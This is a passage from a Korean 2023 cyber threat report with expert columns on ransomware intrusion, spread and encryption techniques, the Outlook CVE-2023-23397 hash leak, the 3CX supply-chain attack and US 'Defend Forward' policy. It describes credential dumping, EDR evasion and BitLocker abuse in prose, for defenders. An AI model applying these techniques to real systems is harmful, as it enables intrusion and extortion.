쿠팡에서는 정기적으로 퍼플팀 활동을 수행하면서 조직에 기대하는 부분은 아래와 같다.
1. 정보 보안 조직 내 협업 문화 육성
2. 위협 모델링을 통한 명확한 목표 설정
3. 조직에 특화된 공격 체인 테스트
4. 실습을 통한 참여자들의 지식 차이 축소
5. 제로 지식 기반 TTP 테스트
31
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Part. 2
랜섬웨어는 다크웹을 통해 진화하고 있으며, 비트코인을 이용해 수익을 분산시키는 방식으로 운영되고 있어 낮은
금액으로도 쉽게 악용될 수 있는 상황이다. 또한, 비트코인과 직접적으로 연결되는 범죄로 간주되어 관심을 받고
있기 때문에 기술력도 급속한 속도로 발전하고 있다. 랜섬웨어 공격 구조를 이해하기 위해 감염 사례를 살펴보고,
이를 통해 침입 및 감염 방법과 그 변화를 파악해 최근 동향을 파악하고자 한다.
악의적인 공격자가 파일 접근 및 실행 권한을 획득하면 다양한 방법을 사용해 악의적인 목적을 수행할 수 있다.
과거에는 랜섬웨어 공격이 주로 피싱 메일에 첨부된 실행 파일을 통해 침입 및 감염 단계를 수행하는 방식이
일반적이었다. 하지만, 보안 관심도가 높아지며 단순 형태의 공격이 무효로 돌아가므로 점차 기술 고도화를 통해
공개된 취약점으로 권한을 획득하고 EDR 솔루션에 의한 공격 실패를 회피하기 위한 공격기법이 꾸준히 발전하고
있는 현황이다.
한 가지 사례로, 권한을 획득하고 연관된 계정정보 기반으로 원격 데스크톱 프로토콜(RDP) 연결을 수행해 내부에
전파한다. 수직 및 측면 이동을 통해 피해 대상을 확장한 뒤 데이터를 암호화하거나 유출을 통한 공개 협박 방식으로
진행된다. 침입 단계 취약점 악용 방식은 최근 Outlook 기능을 악용한 취약점 CVE-2023-23397을 통해 문제
원인과 악용 과정을 알아보고자 한다. 이러한 사례를 통해 취약점 패치에 대한 지속적인 관심이 필요함을 역설적으로
강조한다.
32
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
감염 사례를 통한 랜섬웨어 공격 구조
침입 전파 간염
[감염]
*E업체
귀신 랜섬웨어에서 사용되는 윈도우 설치파일(msi)을 통해 EDR 솔루션
감지를 우회하고 파일을 변조
*F업체:
공격자 원격 연결 및 스크립트 배포를 통해 Windows OS에서 지원하는
스토리지 암호화 프로그램(BitLocker)을 통해 변조
*G업체
DRM으로 암호화되어 저장된 파일서버에 데이터를 자동화툴을 통해
[침입] 복호화 작업 및 원본파일 유출
*A업체 공격자는 접촉을 통해 다크웹의 정보공개를 볼모로 비트코인 요구
재택근무 PC에서 악성코드가 포함된 글꼴 다운로드 행위로
백도어 설치
VPN 접속시 네트워크는 차단되나 기존 연결 세션이 [전파]
유지되어 원격 연결 유지 *C업체
공격자는 원격접속을 통해 비밀번호가 노출된 서버
*B업체
연결정보를 저장한 파일 획득
편의를 위해 파일서버로 사용되는 PC에 Brute-force
AD서버의 '그룹정책 자동프로그램설치' 기능을 통해
공격으로 계정인증이 이루어지고 MSSQL 원격코드
연결된 단말기에 실행 권한 획득
취약점 공격을 통해 PC의 실행 권한 획득
*D업체
실행 권한을 통해 스크립트를 통해 PC에 저장된
계정정보를 RDP 연결에 사용하여 감염 키트 전파
렌섬웨어 (BltLocker)
파일 업로드 취약점 크리덴셜 탈취
2022-08-29 제조업 ㄱ사 WebShell - RDP -
(그룹웨어) (LSASS Dump)
정보 파괴 (NAS포맷)
그림 2-2 최근 랜섬웨어 공격 사례 요약
33
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
1. 침입
외부에서 내부 PC 자원에 접근하기 위해서는 권한을 얻는 것이 필수적이다. B 업체의 경우, 작업을 위해 인터넷망과
연결된 PC에 RDP(원격 데스크톱 프로토콜) 공격을 통해 초기 침투가 확인됐다. 이 PC는 대용량 스토리지(SSD)를
연결하고 파일 서버와 같은 운영을 위해 폴더 공유 기능을 사용하고 있었는데, 계정과 비밀번호 관리가 소홀하게
이뤄졌다.
감염 PC 이벤트 뷰어 확인 결과, RDP 요청이 계속해서 이루어진 후 승인된 사실이 확인돼 Brute-force(무차별
대입) 공격을 통해 최초 권한을 획득한 것으로 판명됐다. 이는 살포형 랜섬웨어로 분류되며, 스크립트 형태로 구성된
일련의 공격 킷으로 구성돼 침입, 전파, 감염 행위를 수행한다. 공격 방식은 최근 공개된 취약점을 이용한 zero/one
day Attack, 보안 설정이 되지 않은 PC의 default 값을 이용한 공격이 대표적이다.
타겟형 랜섬웨어는 매출 규모와 보안 투자 비용을 비교해 특정 업체를 선정하는 방식으로 진행된다. 공개된 담당자
메일주소에 공공기관을 사칭하거나 업무와 관련된 내용을 꾸며 전달한 피싱 메일의 링크나 문서파일 매크로를 통해
침입하는 방법이 대표적이다.
34
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
그림 2-4 최근 접수된 피싱 메일
외부로부터 내부 PC의 권한을 획득하기 위한 침입 과정은 외부에서 내부로 접근하는 방안을 통해 이뤄지므로
제한적이며, 주로 다음과 같은 방법으로 진행된다. 특히, 보안 관리가 소홀한 일반 PC에서 이뤄지는 경우가 많다.
또한, 최근 팬데믹 이후 재택근무 형태가 유지되면서 범죄 발생률이 더욱 증가하고 있다.
1. 일반 PC를 통한 내부망 전파
침입자는 일반 PC를 감염시킨 후, 내부 네트워크로 전파해 중요 자원에 접근하거나 서버 취약점을 이용해 침투한다.
2. 보안 관리 소홀로 인한 위험
업무 편의성을 위해 일반 PC에서 보안 관리가 소홀해지는 경우가 많다. 이로 인해 침입자들은 취약한 보안 설정을
타깃으로 삼아 침투를 시도한다.
35
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
3. VPN 연결을 통한 침입
재택근무로 인해 VPN 연결을 통해 근무하는 경우, 글꼴 다운로드 등을 통해 감염된 재택 PC에서 네트워크 차단이
이뤄져도 기존 연결됐던 세션이 유지될 수 있어 침입 경로로 이용될 수 있다.
4. 다양한 침입 방법
RDP 접근, MSSQL 서버의 취약한 계정(sa)을 이용한 원격 코드 실행, 피싱 메일을 통한 악성 코드 실행 또는 첨부
파일 실행 등 다양한 방법으로 침입이 시도된다.
2. 전파(수직/측면 이동)
해커가 침입한 PC는 감염 가능한 상태로 변화하며, 내부 망의 다른 PC에 추가적인 감염을 위한 출발점으로
사용된다. 이러한 과정에서 주로 사용되는 방법 중, 하나는 크리덴셜 덤핑 공격(Credential Dumping Attack)이다. 이
공격은 다음과 같은 방식으로 동작한다.
1. 로컬 보안 프로세스(Lsass.exe)를 통한 데이터 저장
연결된 인증 정보 및 저장된 정보는 로컬 보안 프로세스(Lsass.exe)에 저장된다. 이 프로세스의 메모리에는 계정
정보와 관련된 데이터가 저장돼 있다.
2. 메모리 데이터 추출 및 덤프 파일 생성
해커는 로컬 보안 프로세스(Lsass.exe) 메모리 데이터를 추출해 덤프 파일로 저장한다. 이 과정에서 보안 솔루션(예:
Windows Defender, EDR 솔루션 등)에 의해 보호되지만, 해커는 덤프 과정에 변화를 주거나 파일을 난독화해 이를
우회할 수 있다.
3. 덤프 파일 분석
덤프 파일은 해킹 도구인 Mimikatz와 같은 도구를 사용해 분석될 수 있다. 이를 통해 PC에 저장된 계정 정보를
추출할 수 있다. 일반적인 정보는 비밀번호 해시값으로 표시되지만, SMB 프로토콜과 같이 연결된 계정 정보는
평문으로 비밀번호가 표시되는 특징이 있다.
4. 크리덴셜 덤핑 공격
해커가 PC에 저장된 계정 정보를 획득하는 데 사용되는 공격 방법 중 하나이다. 이를 통해 해커는 추가적인 공격을
수행하거나 인증 정보를 악용할 수 있다.
36
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
배포 권한을 가진 서버는 특별한 주의가 필요하다. 특히 AD서버(Active Directory Server)나 NAC(Network Access
Control) 서버는 계정 정보 없이도 배포 권한을 가지므로 공격자에게 권한이 넘어가면 시스템을 완전히 장악하는
것과 같은 심각한 상황이 발생할 수 있다.
37
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
3. 감염
공격자는 악의적인 목적을 달성하기 위해 획득한 권한을 기반으로 여러 기법을 이용한 악성 행위를 수행한다. 최근
랜섬웨어 공격기법은 EDR 솔루션 탐지 회피를 위해 다음과 같은 공격기법을 가진다.
1. 파일리스(Fileless) 기법을 통한 감염
이 기법은 OS(Windows)에서 지원하는 특정 파일(.bat, .jar, .js 등)에 악성 코드를 저장하는 대신, 해당 파일에
담긴 데이터를 자체 프로세스로 실행하는 기능을 활용한다. 예를 들어, JavaScript 파일은 WSH(Windows based
Script Host) 프로세스(wscript.exe)를 통해 실행될 수 있다. 이런 스크립트 코드는 외부 라이브러리(dll) 파일과 같은
악성 코드를 수신하고 실행하기 때문에 공격 추적이 어렵다. EDR 솔루션은 공개된 취약점을 통해 보호 로직을
구성하지만, 코드로 이루어져 있기 때문에 변종 내역을 탐지하기 어려울 수 있다. 이를 보완하기 위해서는 새로운
취약점에 대한 지속적인 보완이 필요하다.
2. BitLocker를 통한 영역 암호화
BitLocker는 Windows 운영체제에서 드라이브 데이터를 보호하기 위해서 사용되는 전체 디스크 암호화를
지원하는 프로그램이다. 보안 설정에 따라 비활성화된 경우도 있으나 ‘그룹 정책 관리’이나 레지스트리 값 변경을
통해 활성화가 가능하다. 복구 키를 파일 형태로 저장하고 유출하는 방식으로 진행되며, 운영체제에서 제공하는
기능이므로 사용자의 정상 행동인지, 공격자의 행위인지 판단 기준이 모호해 관리되지 않는 경우가 대다수이다.
38
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
운영체제 드라이브가 감염된 경우 재부팅 시 복구 키를 통해 데이터 복원이 진행돼야 부팅이 가능하다. 일반적으로
공격자는 담당자 이메일을 통해 접촉해 복구 키를 담보로 거래를 요청한다. 또한, 위의 과정은 공격자가 원격 접속
권한을 통해 작업하는 경우도 존재하지만, 스크립트 형태로 일련의 구성이 가능하므로 실행 권한을 통해 동작하는
살포형 랜섬웨어의 감염행위로도 이용된다.
3. 정보 유출을 통한 다크웹 공개 협박
랜섬웨어 공격 방식은 파일을 사용할 수 없도록 변조하는 것에 국한되지 않고, 악의적인 목적을 달성하기 위해
다양한 전략을 사용한다. 특히, 해킹형 랜섬웨어는 기업의 매출 내역, 보안 산업에 대한 투자 비율, 데이터의 가치
등을 비교해 목표를 정하므로 목적에 맞는 기법을 변동적으로 사용한다. 최근에는 국가 기밀로 판단되는 기술을
소유한 기업 대상으로 정보 유출을 담보로 금전을 요구하는 방식이 흔히 사용되고 있다.
39
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
그러나 거래 이후의 과정은 공격 집단의 선택에 따라 결정되는 사항임을 인지할 필요가 있다. 실제로 거래에 응하고
대가를 지불한 후에도 주요 데이터를 파기하지 않고 별도 구매자를 찾아가는 사례가 있다. 때로는 해당 기업에
2차 공격을 수행해 파일을 변조하는 사례도 있다. 따라서 기업은 거래에 동의하는 대신 공격자를 신고해 추적하는
방향을 우선으로 고려해야 한다.
또한, 이러한 공격을 예방하기 위해서는 보안에 대한 지속적인 강화와 주의가 필요하다. 시스템 및 데이터 보호에
대한 강력한 조치, 취약점 관리, 교육 및 인식 향상 등의 수행이 요구된다.
40
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
악의적인 공격자가 작성한 이메일을 수신한 사용자가 해당 이메일의 미리 알림 사운드 파일을 설정하기 위해
공격자의 SMB 서버에 접근하면, 인증이 강제로 이뤄지게 된다. 이 과정에서 인증을 위해 사용되는 NTLM 계정의
비밀번호 해시(HASH)가 공격자에게 노출되고, 이는 추가적인 침입 과정에서 악용될 수 있다.
일반적으로 취약점이 공개된 후 패치가 나오기까지는 시간이 소요된다. 이 기간에 취약점을 이용한 공격을 zero-
day 공격이라 한다. 그리고 취약점 패치가 나온 후에도 해당 패치를 적용하지 않은 시점 이전의 공격은 one-day
공격으로 분류된다.
그림 2-10 Outlook 미리 알림 및 알림 소리 지정 화면
41
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
3 획득 정보를 통해 User
접속 및 권한 획득
결론
물론, 최신 패치를 적용한다고 보안 위협이 없어지는 것은 아니다. 새로운 기능은 새로운 취약점의 발생을
야기하기 때문이다. 하지만, 새로운 취약점은 발견하는 과정까지의 시간이 소요된다. 공격자와 방어자
모두에게 새로운 문제이기 때문이다. 실제 랜섬웨어 공격 사례를 통해, 공격 행위는 새로운 취약점을 탐색하고
찾아서 시작되는 것이 아니라 관리 소홀, 기존 취약점 패치 미적용, 구축된 보안 구조의 결함 등을 수단으로
수행한다는 점을 알 수 있다.
42
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Part. 2
3CX 연쇄 소프트웨어
공급망 공격 사건과 고려대학교 SW보안연구소
최윤성 교수
2-3 시사점 (과기부 SW공급망보안포럼 정책·산업분과장)
지난 3월 말부터 인터넷에 폭로되기 시작한 미국 VoIP 업체 '3CX'의 SW 공급망 침해 사고에는 몇 가지 특징이 있다.
1) 서로 다른 2개의 SW 공급망을 통해 악성코드가 전파된 것이 확인된 최초의 사례이고, 2) 초기에 알려진 것과 달리
단순한 정보 탈취(InfoStealer)용 악성코드가 아닌 모듈 확장형 백도어를 통한 맞춤형 공격이었으며, 3) 과거 암호화폐
거래소를 노린 애플제우스(AppleJeus) 활동과의 연관성으로 북한 배후 해킹그룹 라자루스(Lazarus)의 소행으로
추정된다는 것이다. 악의적인 코드 수정을 통해 SW 배포 인프라의 취약한 연결 부위를 노리는 수법은 악성코드
전파력이 매우 높아 예전부터도 활용되었지만, 최근에는 SW 공급망의 복잡도가 더욱 증가함에 따라 피해 범위와
대상이 확대되고 있어 공동의 대책 마련이 필요하다.
43
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
1. SW 공급망으로 확대되는 공격 벡터
소프트웨어 공급망(Software Supply Chain)은 SW의 초기 개발부터 배포 및 업데이트 지원까지의 절차와 활동을
포함해 SW 생산, 유통, 유지 관리에 이르는 전 과정을 의미한다.
1) 차세대 공급망 공격(SonarType, 2023): 종속성 혼동(Dependency Confusion), 악성코드 주입(Malicious Code Injection),
타이포스쿼팅(Typosquatting), 프로테스트웨어(Protestware)
44
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
45
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
46
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Date Description
X_TRADER의 악성 패키지는 코드 서명 인증서가 만료된 지난해 10월 이전에 3CX에 설치된 것으로 추정된다. 그
후 VEILED_SIGNAL이라는 백도어가 생성되었고, 공격자에게 3CX 직원 컴퓨터에 대한 전체 관리 및 시스템 권한을
부여하는 악성코드가 설치되었다. 공격자는 3CX 직원의 컴퓨터를 장악한 후, 내부 시스템에 접근할 수 있는 자격
증명을 도용해, 관리자로서 3CX DesktopApp의 윈도우 및 맥(Mac) 버전의 빌드 서버에 침투했다.
빌드 서버 해킹으로 영향을 받은 버전은 총 6개로, 공격자는 도구를 활용해 3CX 기업용 버전에도 악성코드를
주입하였다. 이후 침해 사실을 인지한 3CX CISO는 홈페이지를 통해 영향을 받는 정확한 버전, 시스템 침해 범위,
업데이트 계획, 후속 대책 논의를 위한 포럼 페이지 등을 공지했다.
47
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
48
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
또한 “SW 공급망이 연쇄적으로 공격 받았다는 것은 북한 해커의 역량이 지속해 증가하고 있다는 것을 의미한다. 북한
공격자들은 악성코드를 개발하고 유포하는 독창적인 방법(예: GitHub의 *.ico 파일에 C&C URL을 인코딩한 후 이를
다운로드하여 탐지를 피함, [그림 5] 참조)을 사용하고 있으며, 네트워크 간 이동을 통해 감염 범위를 확대하고 있다”고 했다.
카스퍼스키는 3CX DesktopApp 샘플에서 2020년 동남아시아의 암호화폐 기업 조사에서도 발견된 라자루스의
백도어(Gopuram)를 발견했다. 구글의 위협분석그룹(TAG)도 감염된 X_TRADER가 배포되기 전인 2022년 3월에
이와 같은 내용의 분석 보고서를 공개한 바 있어, 북한 배후 연결에 신뢰성을 더했다. 참고로 Gopuram은 대상
시스템에 필요한 추가 페이로드를 내려받아 기능을 확장하는 모듈 확장형 백도어이다. 모듈 확장형 백도어의 출현은
2016년 러시아 배후의 해킹 그룹이 우크라이나의 변전소를 공격하고 당시 침해 대상의 맞춤형 제어 프로토콜을
추가로 다운로드하는 Industroyer(2016) 악성코드 프레임워크를 개발했을 때로 거슬러 올라간다.
이렇게 공격자들이 기술을 발전시키고 지속해서 SW 공급망을 해킹함에 따라 시스템 무결성은 손상되고, SW를
신뢰하는 기본 메커니즘(Mechanism)이 더욱 약화하고 있다. 이것은 보안 취약점이나 이메일 피싱을 통한 사이버
공격보다 우리 삶에 더 큰 영향을 미치며, 궁극적으로 SW 업데이트나 공급업체를 신뢰하지 못하도록 만들 수 있다.
2) 분석 그룹의 명명에 따라 Barium 또는 ShadowHammer, ShadowPad 또는 Wicked Panda로도 알려져 있으며, NetSarang(2017),
CCleaner(2017) 및 ASUS(2019) 공격의 유사성으로 중국 배후 해킹 그룹으로 분류됨 (WIRED, 2019)
49
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
SBOM과 공급망 방어 전략
우리는 현대 디지털 인프라의 사회적 중요성에 비해 SW 개발 및 유통 채널의 보호 기능이 미비하고 경계망 방어
등 사후 대응에도 한계가 있음을 체감하고 있다. SW 공급망의 보안성과 신뢰성이 이슈로 대두되고 있는 상황에서
앞으로 SW 공급망의 중요성은 더욱 커질 것이며, 시간이 지날수록 연쇄 공급망 공격으로 인한 피해자가 더 많이
나타날 것은 명백하다.
최근 미국, 유럽연합, 일본 등 SW 시장이 큰 선진국들은 '제3자 리스크' 관리를 목표로 SW 공급망을 보호하기
위해 노력하고 있다. 특히 미국은 바이든 대통령의 행정명령(EO 14028, 2022)과 국가 사이버보안 전략(National
Cybersecurity Strategy, 2023)을 통해 ‘안전하지 않은 SW와 서비스에 대한 제조업체의 책임’을 강조했다. 현재
백악관 관리예산실(OMB)과 FDA를 선두로 논의되는 SW 공급망에 대한 보안 요구사항은 크게 두 가지로 요약할 수
있다. 1) SW 개발 및 배포 프로세스의 취약점 패치 등 업데이트를 위한 보안 개발 생명주기(S-SDLC)3) 관리 체계의
구축과 2) SW 부품명세표(SBOM) 제출로 회자하는 구성요소의 투명성 및 책임 추적성의 향상이다.
50
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
51
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
시사점 및 맺음말
타사 구성요소를 사용해 경계망을 넘는 공급망 공격을 완벽하게 방어하기는 어렵지만, 아티팩트(Artifact) 분석을
통한 공격자 탐지 및 추적 기술도 나날이 발전하고 있다. 다만, SW 투명성 확보를 위한 감사(Audit) 기능을 지나치게
강조하는 것은 보안 기밀성을 저해할 수 있기 때문에 분석의 정확성을 높이는 기술과의 연구개발을 병행해야 한다.
또한 중소기업 위주로 형성된 국내 보안 시장을 감안하여, SBOM 확산을 위한 인센티브 제도도 마련되어야 한다.
향후 미국과 EU의 SBOM 제출 요구는 무역장벽이자 SW 품질관리에 대한 규제로 해석할 수 있다. 앞선 사례에서
공격자는 SW 공급망의 모든 단계에 침투하여 개발 자산을 훼손하거나, 개인정보를 도용할 가능성이 있으므로 SW
기업은 공급망 안전을 유지하기 위한 보안대책과 모니터링 체계를 수립하여 대비해야 한다. SW 엔지니어는 보안의
특성을 이해하고 개발자에 친화적인 자동화 도구를 구축하여 취약성이 SW 품질을 손상하는 것을 방지해야 한다.
향후 보안 전문가와 SW 개발팀 간의 협업으로 성숙한 S-SDLC 구축의 중요성이 강조되어, 개발자 커뮤니티를 통한
보안 문화의 확산도 기대한다.
52
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
53
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
종합하면 소프트웨어 공급망 방어의 시작은 관련된 산업 전반의 연대를 강화하는 것으로 축약할 수 있다. SW
보안 품질에 대한 인식 변화를 통해 내부 위험관리 조직과 컨트롤 타워를 만들고, 다양한 이해관계자를 위한 협력
프로세스 구축으로 모두가 합심해야 할 때이다.
출처
•“Software Supply Chain Security: Your Attack Surface Is Bigger Than You Think”, cycode.com, 2022.02
•“Supply Chain Security: Protecting Your Data from Third-Party Risk”, TechBullion.com, 2023.02
•“8th Annual State of the Software Supply Chain”, SonarType, 2023
•“SmoothOperator | Ongoing Campaign Trojanizes 3CXDesktopApp in a Supply Chain Attack”,
SentinelOne, 2023.03
•“Not just an infostealer: Gopuram backdoor deployed through 3CX supply chain attack“
Kaspersky, 2023.03
•“3CX Software Supply Chain Compromise Initiated by a Prior Software Supply Chain Compromise;
Suspected North Korean Actor Responsible”, Mandiant, 2023.04
•CISA’s Analysis Report “MAR-10322463-5.v1 - AppleJeus: CoinGoTrade”,
https://www.cisa.gov/news-events/analysis-reports/ar21-048e
•Google Updates from Threat Analysis Group (TAG), “Countering threats from North Korea”, 2022.03
•“The Huge 3CX Breach Was Actually 2 Linked Supply Chain Attacks”, WIRED, 2023.04
•“A Mysterious Hacker Group Is On a Supply Chain Hijacking Spree”, WIRED, 2019.05
•“How to Select DevSecOps Tools for Secure Software Delivery”, Gartner, 2023.01
•최윤성(2022), 미국의 소프트웨어 공급망 보안 정책 동향: SBOM 사례를 중심으로, 정보보호학회지,
제32권 제5호, pp. 7-14
54
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
Part. 2
서 론
국은 자국을 위협하는 주요 요인들 중, 제1순위로 외부로부터의 사이버 공격을 인정하고 있고, 전 지구적으로는
미
중국, 러시아 및 적대 국가의 공세가 커짐에 따라 사이버공간의 안전성을 확보하기 위해 국가 차원의 사이버 안보
전략을 수립해 왔다.
근 미 국방부는 새로운 사이버 안보전략을 미 의회에 제출하였고, 지난달 5월에 이와 관련된 ‘Fact Sheet’를 공개
최
하면서 조만간 요약 보고서를 제공할 것이라고 하였다.1) 이는 2018년 국가 사이버 안보전략 및 대통령 안보메모,
대통령 정책지침 등을 통해 그동안 발전시켜오던 ‘선제적 방어’(defend forward)전략을 포함할 것으로 이해된다.
efend Forward 개념은 공격적인 사고 방식으로 방어하고, 악의적인 사이버 활동을 초기 단계에서 선제적으로
D
방해하거나 중지하며, 적의 비용을 증가시키는 사이버 전략을 의미한다.
전략 개념은 2018년 미 사이버 사령부 비전(Command Vision for US Cyber Command), 국방부 사이버 전략
이
(DOD Cyber Strategy), 2020년 사이버 솔라리움위원회 최종 보고서(Cyberspace Solarium Commission Final
Report) 등 각종 사이버 전략 보고서에도 명시되어 있고, ‘23년 최근 발표한 국가 사이버 안보전략(National-
Cybersecurity-Strategy-2023)의 ’위협 행위자에 대한 적극적인 대응’2)과 연계된다.
국 애틀랜틱위원회(Atlantic Council)에서 지난해 3월 발간한 ‘미국 사이버 전략의 다음 단계를 준비하는 방안’
미
(Preparing the next phase of US cyber strategy)3) 보고서에서는 'Defend Forward’ 전략이 공격 억지의 유효성이
얼마나 있는가에 대해 찬반의 의견을 조망하고 있지만, 현재까지도 미국 사이버 억지 전략의 핵심 키워드로
자리하고 있다.
1) https://defensescoop.com/2023/05/26/dod-sends-new-cyber-strategy-to-congress-releases-unclassified-fact-sheet/
2) Pillar II: Disrupt and dismantle thereat actor
3) https://www.atlanticcouncil.org/in-depth-research-reports/issue-brief/preparing-the-next-phase-of-us-cyber-strategy/
55
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
국은 2001년 부시 행정부 이래 20여년간 사이버 공간의 안전을 위한 국가 전략을 발표해 왔다. 2018년
미
트럼프 정부에서는 ‘사이버 국방전략’4)을 통해 미국의 기반시설을 대상으로 한 악의적 사이버 활동의 선제
제압(preempt), 무력화(defeat), 억지(deter)하고 무력을 사용하여 악의적 사이버 활동을 억지하겠다고 밝힌바
있다.
국방부가 악의적 사이버 활동과 그 원천을 방해하거나 중지하기 위해 무력 분쟁 수준 이하의 대응을 포함한
미
선제적 방어(defend forward)를 수행할 것임을 강조하였고, 이어 최근 바이든 행정부는 defend forward 개념을
보다 강화하는 방향으로 전개되고 있다
020년 발표된 솔라리움 위원회 보고서5)에서는 사이버 보안에 대한 새로운 전략적 접근 방식인 계층화된
2
사이버 억지를 제시하고 있고, 아래 그림과 같이 Defend Forward 개념이 잘 도식화되어 있다. 계층화된 사이버
억지가 지향하는 최종 목표는 심각한 결과를 초래할 사이버 공격 가능성과 영향이 최종 대상지에서는 그 효과를
최소화 시키는 것이다.
4) https://media.defense.gov/2018/Sep/18/2002041658/-1/-1/1/CYBER_STRATEGY_SUMMARY_FINAL.PDF
5) Cyberspace solarium commission report 2020, https://www.solarium.gov/report
56
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
에서 설명한 세 가지 방법은 각각 적이 미국의 이익을 공격하기 위해 사이버 공간을 사용하는 비용과 이익을
위
인식하는 방식을 변경하여 미국의 공공 및 민간 부문 보안을 강화하는 각 억지 계층을 표현하고 있다.
57
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
층화된 사이버 억지 개념의 핵심 아이디어는 간단하다. 미국의 이익에 반하는 사이버 공격을 계획할 때
계
적이 예상하는 비용은 늘리고 이익은 줄이는 것입니다. 이는 공공 및 민간 부문에서 동시적으로(concurrent),
지속적으로(continuous), 협력적(collaborative)으로 여러 억지 메커니즘을 사용함으로써 달성할 수 있다.
(Entanglement/Norms) 첫 번째 계층에서 파트너 및 동맹국과 함께 공동의 이익과 가치를 기반으로
사이버 규범을 공동으로 개발하고 구현한다. 이 계층의 조치에는 외교, 법 집행 협력, 새로운 위협 벡터 및
취약성에 대한 정보 공유가 포함된다.
에, Defend Forward는 악의적인 사이버 활동에 관여하는 적에게 대가를 부과하기 위해 사이버 공간에서
이
지속적으로 관여할 수 있는 능력을 보유하기를 요구한다. 비용 부과 계층은 또한 정부가 선택한 시간과 장소에서
군사력으로 대응할 수 있는 능력을 보호할 것을 요구한다.
근 민간 영역에서 기업들을 위해 Cyber Defenders Council7)을 구성하여 "Defend Forward"로 알려진 사이버
최
억지 전략을 채택하고, 조직이 공격자의 비용을 늘리고 방어자의 효율성을 개선하는 Defend forward 사이버 보안
전략을 구현하는 데 도움이 되는 규범적 지침을 제공하려고 한다.
7) https://www.cybereason.com/cyber-defenders-council
58
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
yber Defenders Council의 해석 또한, 국방부 사이버 전략에 설명된 대로 Defend Forward는 악의적인 사이버
C
활동이 목표에 도달하기 전에 선제적으로 방해하거나 중지하는 것을 의미한다. 이 접근 방식은 아래 세부 사항을
포함한다.
정보(INTELLIGENCE) 적의 전술, 기술 및 절차(TTP: tactics, techniques, and procedures)에 대한 정보
수집
efend Forward 전략은 2018년과 마찬가지로 오늘날 사이버 보안 전략과 관련이 있으며, 특히 세계가 러시아와
D
우크라이나 간의 분쟁으로 인한 사이버 공격에 대비하고 있는 것과 이어지고 있다. Defend Forward에 대한
국방부의 정의에는 민간 기업이 참여할 수 없는 공격 활동이 포함되지만, 민간 부문은 능동적인 "적과의 싸움"
관점과 억지력에 중점을 두는 것 양쪽 모두에서 교훈을 얻을 수 있다.
도적인 글로벌 조직은 이미 Defend Forward 원칙을 채택하는 방향으로 나아가고 있다. EC3(European
선
Cybercrime Center)8)의 전략 책임자인 Philipp Amann은 Defend Forward가 사이버 공격자를 처리할 때
EC3에서 지원하는 선제적이고 억지 중심적인 접근 방식과 일치한다고 했다. 예를 들어, Amann은 조직이
공격자에게 몸값을 지불하지 않고 데이터를 복구할 수 있도록 지원하는 No More Ransom 이니셔티브와 함께
악의적인 행위자가 새로운 기술을 남용할 수 있는 방법을 평가하기 위해 EC3가 설립한 규제 및 기술 감시
기능을 인용했다.
찬가지로 BT의 명예 CSO이자 Protect BT Services & Operations의 전 이사인 Steve Benton에 따르면 BT의
마
보안 프로그램은 공격을 저지하기 위한 세 가지 목표를 중심으로 구축되었다고 했다.
8) https://www.europol.europa.eu/about-europol/european-cybercrime-centre-ec3
59
2023년 상반기 사이버 위협 동향 보고서 Insights
전문가 칼럼
항상 위험에 처해 있다고 가정하라 "블랙 스완"처럼 보다 개연성이 희박한 다양한 시나리오에 대비하는 데
투자하도록 조직의 고위 경영진을 설득한다. NotPetya9) 또는 Colonial Pipeline 사고10) 수준으로 심각해지는
또 다른 공격을 원하지 않기에 ISACS11) 및 Cyber Defenders Council과 같은 산업 조직이 해당 산업에 대한
위협 시나리오를 사전 준비할 것을 권장한다.
위협을 이해하라 자신을 표적으로 삼을 가능성이 높은 잠재적 공격자, 공격하려는 이유, 네트워크 보안,
애플리케이션 보안, 악용할 수 있는 공급망 보안 취약점을 이해하고 취약점의 우선순위를 사전에 정리하라.
정보 공유와 협업하라 산업 전반과 연방정부, CSIRTS(computer security incident response team), 학술
기관과의 협업 및 정보 공유가 위협을 이해하고 선제적으로 해결하는 데 중요하다. 익명성을 보호하도록
설계된 정책과 프로세스를 통해 신뢰를 구축하는 것이 필요하며, OT-ISAC는 TLP(Traffic Light Protocol) 및
익명 제출을 활용하는 기계 간 공유 메커니즘이 지원하고 있다.
위협 정보를 기반으로 판단하고 대응하라 위협 정보를 기반으로 다양한 전략 및 전술적 보안 결정이
이루어져야 하며, 모든 보안 실무자가 위협 정보를 일상적인 대응 및 의사 결정에 최대한 많이 통합
반영되도록 권장한다.
대규모 분석 기술을 활용하라 대규모 분석 기능은 의심스러운 활동을 초기 단계에서 사전에 발견하고
공격을 중단할 수 있도록 한다. 위협 추적, 조기 탐지 및 자동 대응을 위해 대규모로 인공 지능 및
머신러닝을 활용하는데 필요한 데이터 관리 기능이 필요하다.
